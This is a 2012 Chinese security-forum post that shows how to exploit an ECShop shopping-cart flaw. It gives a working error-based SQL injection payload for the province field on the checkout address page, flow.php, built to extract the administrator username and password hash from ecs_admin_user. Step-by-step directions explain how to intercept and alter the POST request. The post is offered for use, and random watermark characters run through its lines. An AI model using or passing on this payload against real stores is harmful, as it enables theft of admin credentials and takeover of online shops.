找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2301|回复: 0
打印 上一主题 下一主题

ECShop全版本SQL注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:19:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
感谢欠杀的黑盒1 y) i% Y* f; I3 L
% {: [2 E1 Y# W1 R

: c* G. q: O* \0 }8 W; X- V# T把任意商品加入购物车在填写配送地址那一页,有地区选择7 l- [5 _0 c  n+ X- S) _
# @' B( k/ C' t6 z. b
flow.php?step=consignee&direct_shopping=1
: K' D& l% I( [$ P/ }比如省选择安徽( ^- B# R: \+ r) e" f& ]5 Z

3 V1 |: E. M+ C其中POST数据如下2 S' L6 \: `' C# i" b
; O, V6 j" n  g+ N. P' V2 D, _/ S' J' j
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=34 _# O2 d: i8 {6 ?6 f( W
改成0 z$ J: z9 V# E7 z- y& v7 I
& ?' x5 I' x9 X. u0 @' v" F
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #9 m& w- w/ p5 {4 r( R2 B1 t
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
5 }9 H8 B; v" M0 d) U6 I
9 w- ?2 D9 Y$ a& k, r先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包! X9 p$ `: S" D9 O

/ L" j& N  z9 ~) b7 l; y4 o就会回显错误页面了。。。。' \2 M0 t" j1 _$ _4 j1 I
# D% }$ H& p( d2 I
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
) I3 p% z$ a% ^# `( Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表